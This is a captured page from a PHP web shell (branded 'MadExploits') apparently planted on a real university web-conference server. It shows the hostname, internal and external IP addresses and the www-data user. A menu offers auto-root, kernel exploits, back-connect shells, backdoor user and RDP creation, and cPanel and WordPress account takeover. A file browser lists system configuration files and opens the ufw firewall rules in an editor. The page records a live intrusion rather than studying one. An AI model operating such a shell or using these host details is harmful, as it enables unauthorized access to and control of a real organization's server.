Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.181.181
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
lib /
ucf /
cache /
[ HOME SHELL ]
Name
Size
Permission
Action
:etc:apt:apt.conf.d:20auto-upg...
80
B
-rw-r--r--
:etc:apt:apt.conf.d:50unattend...
5.33
KB
-rw-r--r--
:etc:default:grub
1.18
KB
-rw-r--r--
:etc:default:nfs-common
627
B
-rw-r--r--
:etc:idmapd.conf
206
B
-rw-r--r--
:etc:php:7.4:mods-available:ca...
74
B
-rw-r--r--
:etc:php:7.4:mods-available:ct...
71
B
-rw-r--r--
:etc:php:7.4:mods-available:ex...
70
B
-rw-r--r--
:etc:php:7.4:mods-available:ff...
69
B
-rw-r--r--
:etc:php:7.4:mods-available:fi...
74
B
-rw-r--r--
:etc:php:7.4:mods-available:ft...
69
B
-rw-r--r--
:etc:php:7.4:mods-available:ge...
73
B
-rw-r--r--
:etc:php:7.4:mods-available:ic...
71
B
-rw-r--r--
:etc:php:7.4:mods-available:js...
68
B
-rw-r--r--
:etc:php:7.4:mods-available:my...
71
B
-rw-r--r--
:etc:php:7.4:mods-available:my...
72
B
-rw-r--r--
:etc:php:7.4:mods-available:op...
79
B
-rw-r--r--
:etc:php:7.4:mods-available:pd...
69
B
-rw-r--r--
:etc:php:7.4:mods-available:pd...
74
B
-rw-r--r--
:etc:php:7.4:mods-available:ph...
70
B
-rw-r--r--
:etc:php:7.4:mods-available:po...
71
B
-rw-r--r--
:etc:php:7.4:mods-available:re...
76
B
-rw-r--r--
:etc:php:7.4:mods-available:sh...
71
B
-rw-r--r--
:etc:php:7.4:mods-available:so...
73
B
-rw-r--r--
:etc:php:7.4:mods-available:sy...
73
B
-rw-r--r--
:etc:php:7.4:mods-available:sy...
73
B
-rw-r--r--
:etc:php:7.4:mods-available:sy...
73
B
-rw-r--r--
:etc:php:7.4:mods-available:to...
75
B
-rw-r--r--
:etc:php:7.4:mods-available:zi...
66
B
-rw-r--r--
:etc:rsyslog.d:50-default.conf
1.1
KB
-rw-r--r--
:etc:ssh:sshd_config
3.21
KB
-rw-r--r--
:etc:ufw:after.rules
1004
B
-rw-r--r--
:etc:ufw:after6.rules
915
B
-rw-r--r--
:etc:ufw:before.rules
2.48
KB
-rw-r--r--
:etc:ufw:before6.rules
6.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : :etc:ufw:before.rules
# # rules.before # # Rules that should be run before the ufw command line added rules. Custom # rules should be added to one of these chains: # ufw-before-input # ufw-before-output # ufw-before-forward # # Don't delete these required lines, otherwise there will be errors *filter :ufw-before-input - [0:0] :ufw-before-output - [0:0] :ufw-before-forward - [0:0] :ufw-not-local - [0:0] # End required lines # allow all on loopback -A ufw-before-input -i lo -j ACCEPT -A ufw-before-output -o lo -j ACCEPT # quickly process packets for which we already have a connection -A ufw-before-input -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT -A ufw-before-output -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT -A ufw-before-forward -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT # drop INVALID packets (logs these in loglevel medium and higher) -A ufw-before-input -m conntrack --ctstate INVALID -j ufw-logging-deny -A ufw-before-input -m conntrack --ctstate INVALID -j DROP # ok icmp codes for INPUT -A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT -A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT -A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT -A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT # ok icmp code for FORWARD -A ufw-before-forward -p icmp --icmp-type destination-unreachable -j ACCEPT -A ufw-before-forward -p icmp --icmp-type time-exceeded -j ACCEPT -A ufw-before-forward -p icmp --icmp-type parameter-problem -j ACCEPT -A ufw-before-forward -p icmp --icmp-type echo-request -j ACCEPT # allow dhcp client to work -A ufw-before-input -p udp --sport 67 --dport 68 -j ACCEPT # # ufw-not-local # -A ufw-before-input -j ufw-not-local # if LOCAL, RETURN -A ufw-not-local -m addrtype --dst-type LOCAL -j RETURN # if MULTICAST, RETURN -A ufw-not-local -m addrtype --dst-type MULTICAST -j RETURN # if BROADCAST, RETURN -A ufw-not-local -m addrtype --dst-type BROADCAST -j RETURN # all other non-local packets are dropped -A ufw-not-local -m limit --limit 3/min --limit-burst 10 -j ufw-logging-deny -A ufw-not-local -j DROP # allow MULTICAST mDNS for service discovery (be sure the MULTICAST line above # is uncommented) -A ufw-before-input -p udp -d 224.0.0.251 --dport 5353 -j ACCEPT # allow MULTICAST UPnP for service discovery (be sure the MULTICAST line above # is uncommented) -A ufw-before-input -p udp -d 239.255.255.250 --dport 1900 -j ACCEPT # don't delete the 'COMMIT' line or these rules won't be processed COMMIT
Close